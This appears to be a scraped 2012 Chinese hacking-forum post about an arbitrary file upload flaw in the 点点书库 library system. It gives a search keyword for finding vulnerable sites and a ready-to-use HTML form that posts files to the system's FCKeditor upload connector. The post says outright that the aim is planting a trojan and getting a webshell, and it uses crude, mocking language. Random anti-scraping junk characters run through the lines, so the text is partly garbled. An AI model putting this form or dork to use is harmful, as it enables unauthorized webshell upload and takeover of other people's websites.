找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7584|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞5 M: E3 x4 c1 @
作者:冰锋刺客
4 r1 k0 ?( ?$ `( K# [, ]# h: l( Q 厂商:点击书(dianjishu.com)1 Z) U+ k6 a; `' K
日期:2012-6-21) s6 S0 N5 ^3 Y' J# l& a, _
$ Z  M( p7 z% t5 G$ G/ k/ c7 D
I 概述
  u/ p" [( X; b0 n9 \+ H4 A   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell8 F* {) i$ k: h
II 简介/ C7 f7 ?( n* d) i, b# c/ M
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"7 t! w) p! G. H" U# X9 P2 ~
补充一个漏洞4 q0 s) I: Z$ J
<form id="frmUpload" enctype="multipart/form-data"
' U8 W6 u! i/ c- Z& f action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>4 b. T# @, U, x( f; C( c
<input id="btnUpload" type="submit" value="操翻他">9 a- `6 O+ }4 A7 d6 {/ n
</form>. k- Q! X5 O. C9 ?! W
你们懂的1 m3 `& V& w4 |2 a' o- m# W7 C
那傻逼提供还需要改包.
) B8 E# y, t! ]# }2 c 自己看了下源代码发现fckeditor
8 d  G* q' h0 ? 直接秒杀/ }; I+ p4 m. h0 d/ _/ k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表